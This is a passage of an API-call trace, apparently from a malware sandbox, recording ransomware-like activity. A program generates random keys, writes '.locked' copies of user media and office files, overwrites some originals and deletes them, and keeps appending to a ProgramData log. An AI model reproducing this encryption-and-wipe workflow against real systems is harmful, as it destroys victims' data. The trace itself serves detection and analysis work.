dwMilliseconds=0xffffffff) returned 0x0 [0279.187] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0279.187] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x1249ce94 | out: lpMode=0x1249ce94) returned 0 [0279.187] SetEvent (hEvent=0x1dc) returned 1 [0279.187] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0279.309] SetEvent (hEvent=0x20c) returned 1 [0279.309] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0279.372] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1265da24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x1265da24*=0xb) returned 1 [0279.473] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\2I YP.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\2i yp.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0279.474] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0279.474] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\2I YP.mkv.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\2i yp.mkv.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0279.617] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0279.617] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e040 | out: pbBuffer=0x1263e040) returned 1 [0279.617] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e070 | out: pbBuffer=0x1234e070) returned 1 [0279.617] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340401 | out: pbBuffer=0x12340401) returned 1 [0279.617] WriteFile (in: hFile=0x230, lpBuffer=0x126d7000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1265dd78, lpOverlapped=0x0 | out: lpBuffer=0x126d7000*, lpNumberOfBytesWritten=0x1265dd78*=0x80, lpOverlapped=0x0) returned 1 [0279.620] ReadFile (in: hFile=0x218, lpBuffer=0x1519c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265dd68, lpOverlapped=0x0 | out: lpBuffer=0x1519c000*, lpNumberOfBytesRead=0x1265dd68*=0x11885, lpOverlapped=0x0) returned 1 [0279.625] WriteFile (in: hFile=0x230, lpBuffer=0x1519c000*, nNumberOfBytesToWrite=0x11885, lpNumberOfBytesWritten=0x1265dd74, lpOverlapped=0x0 | out: lpBuffer=0x1519c000*, lpNumberOfBytesWritten=0x1265dd74*=0x11885, lpOverlapped=0x0) returned 1 [0279.844] ReadFile (in: hFile=0x218, lpBuffer=0x1519c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265dd68, lpOverlapped=0x0 | out: lpBuffer=0x1519c000*, lpNumberOfBytesRead=0x1265dd68*=0x0, lpOverlapped=0x0) returned 1 [0279.844] CloseHandle (hObject=0x230) returned 1 [0280.093] CloseHandle (hObject=0x218) returned 1 [0280.093] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0280.094] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x1265de94 | out: lpMode=0x1265de94) returned 0 [0280.094] WriteFile (in: hFile=0x218, lpBuffer=0x12380200*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x1265de64, lpOverlapped=0x0 | out: lpBuffer=0x12380200*, lpNumberOfBytesWritten=0x1265de64*=0x3f, lpOverlapped=0x0) returned 1 [0280.094] CloseHandle (hObject=0x218) returned 1 [0280.095] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\2I YP.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\2i yp.mkv")) returned 1 [0280.210] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0280.456] SetEvent (hEvent=0x1dc) returned 1 [0280.456] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0280.484] SetEvent (hEvent=0x220) returned 1 [0280.484] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0280.877] SetEvent (hEvent=0x1ac) returned 1 [0280.878] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390260*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12625a24, lpReserved=0x0 | out: lpBuffer=0x12390260*, lpNumberOfCharsWritten=0x12625a24*=0xb) returned 1 [0280.908] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0282.693] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0282.704] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0282.845] SetEvent (hEvent=0x12c) returned 1 [0282.845] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0283.411] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0283.411] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x1239de94 | out: lpMode=0x1239de94) returned 0 [0283.411] WriteFile (in: hFile=0x1b0, lpBuffer=0x125ec1e0*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x1239de64, lpOverlapped=0x0 | out: lpBuffer=0x125ec1e0*, lpNumberOfBytesWritten=0x1239de64*=0x43, lpOverlapped=0x0) returned 1 [0283.411] CloseHandle (hObject=0x1b0) returned 1 [0283.412] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\WqsBnn5V5.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\wqsbnn5v5.flv")) returned 1 [0283.581] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0284.015] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\WqsBnn5V5.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\wqsbnn5v5.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0284.553] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0284.971] SetEvent (hEvent=0x214) returned 1 [0284.971] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1239de88 | out: lpMode=0x1239de88) returned 0 [0284.971] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0285.250] WriteFile (in: hFile=0x1e0, lpBuffer=0x13d1a000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1239de78, lpOverlapped=0x0 | out: lpBuffer=0x13d1a000*, lpNumberOfBytesWritten=0x1239de78*=0xfa000, lpOverlapped=0x0) returned 1 [0285.284] CloseHandle (hObject=0x1e0) returned 1 [0285.619] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0285.970] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\WqsBnn5V5.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\wqsbnn5v5.flv")) returned 1 [0286.513] SetEvent (hEvent=0x198) returned 1 [0286.513] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0286.569] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0286.582] SetEvent (hEvent=0x21c) returned 1 [0286.582] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0286.966] SetEvent (hEvent=0x20c) returned 1 [0286.966] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0286.998] SetEvent (hEvent=0x20c) returned 1 [0286.998] SetEvent (hEvent=0x12c) returned 1 [0286.998] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0287.095] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0287.190] SetEvent (hEvent=0x104) returned 1 [0287.190] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0287.465] SetEvent (hEvent=0x22c) returned 1 [0287.467] SetEvent (hEvent=0x198) returned 1 [0287.467] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0298.531] SetEvent (hEvent=0x14c) returned 1 [0298.531] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0298.763] SetEvent (hEvent=0x190) returned 1 [0298.763] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0299.099] SetEvent (hEvent=0x1dc) returned 1 [0299.099] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0299.252] SetEvent (hEvent=0x1b8) returned 1 [0299.252] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0299.671] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\UYS dfMqbVg.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\uys dfmqbvg.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0299.671] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x12665d9c | out: lpMode=0x12665d9c) returned 0 [0299.671] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\UYS dfMqbVg.xlsx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\uys dfmqbvg.xlsx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0299.918] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x12665d9c | out: lpMode=0x12665d9c) returned 0 [0299.918] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0299.918] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8090 | out: pbBuffer=0x124a8090) returned 1 [0299.919] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0299.919] WriteFile (in: hFile=0x19c, lpBuffer=0x12719000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12665d78, lpOverlapped=0x0 | out: lpBuffer=0x12719000*, lpNumberOfBytesWritten=0x12665d78*=0x80, lpOverlapped=0x0) returned 1 [0299.962] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x0 [0299.966] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb30, ulCount=0x10, ulNumEntriesRemoved=0x3342fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb30, ulNumEntriesRemoved=0x3342fb10) returned 0 [0299.966] SetEvent (hEvent=0x150) returned 1 [0299.966] SetEvent (hEvent=0x1dc) returned 1 [0299.966] SetEvent (hEvent=0x14c) returned 1 [0299.966] SetEvent (hEvent=0x1f0) returned 1 [0299.966] ReadFile (in: hFile=0x1c8, lpBuffer=0x174d0000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12665d68, lpOverlapped=0x0 | out: lpBuffer=0x174d0000*, lpNumberOfBytesRead=0x12665d68*=0x11072, lpOverlapped=0x0) returned 1 [0299.969] WriteFile (in: hFile=0x19c, lpBuffer=0x174d0000*, nNumberOfBytesToWrite=0x11072, lpNumberOfBytesWritten=0x12665d74, lpOverlapped=0x0 | out: lpBuffer=0x174d0000*, lpNumberOfBytesWritten=0x12665d74*=0x11072, lpOverlapped=0x0) returned 1 [0300.146] ReadFile (in: hFile=0x1c8, lpBuffer=0x174d0000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12665d68, lpOverlapped=0x0 | out: lpBuffer=0x174d0000*, lpNumberOfBytesRead=0x12665d68*=0x0, lpOverlapped=0x0) returned 1 [0300.146] CloseHandle (hObject=0x19c) returned 1 [0300.318] CloseHandle (hObject=0x1c8) returned 1 [0300.318] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0300.319] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x12665e94 | out: lpMode=0x12665e94) returned 0 [0300.319] WriteFile (in: hFile=0x1c8, lpBuffer=0x1264a100*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x12665e64, lpOverlapped=0x0 | out: lpBuffer=0x1264a100*, lpNumberOfBytesWritten=0x12665e64*=0x36, lpOverlapped=0x0) returned 1 [0300.319] CloseHandle (hObject=0x1c8) returned 1 [0300.323] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\UYS dfMqbVg.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\uys dfmqbvg.xlsx")) returned 1 [0300.437] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0300.665] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0300.673] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0300.710] SetEvent (hEvent=0x214) returned 1 [0300.710] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0301.517] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0301.528] SetEvent (hEvent=0x22c) returned 1 [0301.528] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0303.752] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb30, ulCount=0x10, ulNumEntriesRemoved=0x3342fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb30, ulNumEntriesRemoved=0x3342fb10) returned 0 [0303.752] SetEvent (hEvent=0x104) returned 1 [0303.752] SetEvent (hEvent=0x14c) returned 1 [0303.752] SetEvent (hEvent=0x190) returned 1 [0303.753] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\0ToZccO18urTblN.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\0tozcco18urtbln.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0303.828] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0303.933] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x1235fe88 | out: lpMode=0x1235fe88) returned 0 [0303.933] WriteFile (in: hFile=0x180, lpBuffer=0x12e8a000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1235fe78, lpOverlapped=0x0 | out: lpBuffer=0x12e8a000*, lpNumberOfBytesWritten=0x1235fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0303.966] CloseHandle (hObject=0x180) returned 1 [0303.997] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\0ToZccO18urTblN.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\0tozcco18urtbln.rtf")) returned 1 [0304.036] SetEvent (hEvent=0x1b8) returned 1 [0304.036] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0304.044] SetEvent (hEvent=0x1b8) returned 1 [0304.044] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0304.055] SetEvent (hEvent=0x1dc) returned 1 [0304.055] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0304.075] SetEvent (hEvent=0x190) returned 1 [0304.131] SetEvent (hEvent=0x21c) returned 1 [0304.131] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0304.137] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0304.138] SetEvent (hEvent=0x12c) returned 1 [0304.138] SetEvent (hEvent=0x20c) returned 1 [0304.138] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0304.162] SetEvent (hEvent=0x214) returned 1 [0304.162] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0304.179] SetEvent (hEvent=0x190) returned 1 [0304.179] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0304.189] SetEvent (hEvent=0x1dc) returned 1 [0304.189] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0304.257] SetEvent (hEvent=0x134) returned 1 [0304.257] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0304.525] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c220*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12625a24, lpReserved=0x0 | out: lpBuffer=0x1234c220*, lpNumberOfCharsWritten=0x12625a24*=0xb) returned 1 [0304.527] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0304.656] SetEvent (hEvent=0x14c) returned 1 [0304.656] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0304.659] SetEvent (hEvent=0x134) returned 1 [0304.659] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0304.661] SetEvent (hEvent=0x14c) returned 1 [0304.661] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0304.662] SetEvent (hEvent=0x104) returned 1 [0304.662] SetEvent (hEvent=0x214) returned 1 [0304.662] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0304.717] SetEvent (hEvent=0x22c) returned 1 [0304.717] SetEvent (hEvent=0x21c) returned 1 [0304.717] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0305.250] WriteFile (in: hFile=0x19c, lpBuffer=0x15234000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1249fe78, lpOverlapped=0x0 | out: lpBuffer=0x15234000*, lpNumberOfBytesWritten=0x1249fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0305.320] CloseHandle (hObject=0x19c) returned 1 [0305.426] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0305.820] SetEvent (hEvent=0x1ac) returned 1 [0305.820] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0305.828] SetEvent (hEvent=0x1f0) returned 1 [0305.828] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0306.773] SetEvent (hEvent=0x190) returned 1 [0306.773] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0306.782] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0306.782] SetEvent (hEvent=0x220) returned 1 [0306.782] SetEvent (hEvent=0x104) returned 1 [0306.782] SetEvent (hEvent=0x198) returned 1 [0306.782] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0306.784] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb34, ulCount=0x10, ulNumEntriesRemoved=0x3342fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb34, ulNumEntriesRemoved=0x3342fb14) returned 0 [0306.784] SetEvent (hEvent=0x150) returned 1 [0306.784] SetEvent (hEvent=0x198) returned 1 [0306.784] SetEvent (hEvent=0x104) returned 1 [0306.784] SetEvent (hEvent=0x1dc) returned 1 [0306.784] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0307.571] SetEvent (hEvent=0x20c) returned 1 [0307.571] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0307.639] SetEvent (hEvent=0x214) returned 1 [0307.639] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0307.661] SetEvent (hEvent=0x14c) returned 1 [0307.661] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0307.688] SetEvent (hEvent=0x1d0) returned 1 [0307.688] SetEvent (hEvent=0x1f0) returned 1 [0307.688] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0310.632] SetEvent (hEvent=0x1d0) returned 1 [0310.632] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0310.633] SetEvent (hEvent=0x190) returned 1 [0310.633] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0310.660] SetEvent (hEvent=0x12c) returned 1 [0310.660] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0310.766] SetEvent (hEvent=0x1b8) returned 1 [0310.767] SetEvent (hEvent=0x21c) returned 1 [0310.767] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0310.770] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0310.778] SetEvent (hEvent=0x12c) returned 1 [0310.779] SetEvent (hEvent=0x20c) returned 1 [0310.779] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0310.857] SetEvent (hEvent=0x1e8) returned 1 [0310.857] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0310.859] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\Qun29tcX.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\qun29tcx.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0310.860] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x12663d9c | out: lpMode=0x12663d9c) returned 0 [0310.860] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\Qun29tcX.wav.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\qun29tcx.wav.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0310.861] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x12663d9c | out: lpMode=0x12663d9c) returned 0 [0310.861] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390020 | out: pbBuffer=0x12390020) returned 1 [0310.861] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392020 | out: pbBuffer=0x12392020) returned 1 [0310.861] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702381 | out: pbBuffer=0x12702381) returned 1 [0310.861] WriteFile (in: hFile=0x228, lpBuffer=0x12573000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12663d78, lpOverlapped=0x0 | out: lpBuffer=0x12573000*, lpNumberOfBytesWritten=0x12663d78*=0x80, lpOverlapped=0x0) returned 1 [0310.879] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x0 [0310.895] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb30, ulCount=0x10, ulNumEntriesRemoved=0x3342fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb30, ulNumEntriesRemoved=0x3342fb10) returned 0 [0310.895] SetEvent (hEvent=0x150) returned 1 [0310.895] SetEvent (hEvent=0x190) returned 1 [0310.895] SetEvent (hEvent=0x21c) returned 1 [0310.895] ReadFile (in: hFile=0x208, lpBuffer=0x1286a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12663d68, lpOverlapped=0x0 | out: lpBuffer=0x1286a000*, lpNumberOfBytesRead=0x12663d68*=0x18a20, lpOverlapped=0x0) returned 1 [0310.900] WriteFile (in: hFile=0x228, lpBuffer=0x1286a000*, nNumberOfBytesToWrite=0x18a20, lpNumberOfBytesWritten=0x12663d74, lpOverlapped=0x0 | out: lpBuffer=0x1286a000*, lpNumberOfBytesWritten=0x12663d74*=0x18a20, lpOverlapped=0x0) returned 1 [0310.930] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0310.971] ReadFile (in: hFile=0x208, lpBuffer=0x1286a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12663d68, lpOverlapped=0x0 | out: lpBuffer=0x1286a000*, lpNumberOfBytesRead=0x12663d68*=0x0, lpOverlapped=0x0) returned 1 [0310.971] CloseHandle (hObject=0x228) returned 1 [0310.971] CloseHandle (hObject=0x208) returned 1 [0310.971] SetEvent (hEvent=0x214) returned 1 [0310.971] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0310.989] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0310.997] SetEvent (hEvent=0x1f0) returned 1 [0311.058] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\6GLhCUHar.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\6glhcuhar.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0311.070] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0311.645] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x125dfe88 | out: lpMode=0x125dfe88) returned 0 [0311.645] WriteFile (in: hFile=0x208, lpBuffer=0x1353c000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dfe78, lpOverlapped=0x0 | out: lpBuffer=0x1353c000*, lpNumberOfBytesWritten=0x125dfe78*=0xfa000, lpOverlapped=0x0) returned 1 [0311.673] CloseHandle (hObject=0x208) returned 1 [0311.673] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\6GLhCUHar.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\6glhcuhar.mp3")) returned 1 [0311.816] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0312.429] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\k84JGTm.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\k84jgtm.mp3"), dwDesiredAccess=0x40000000, 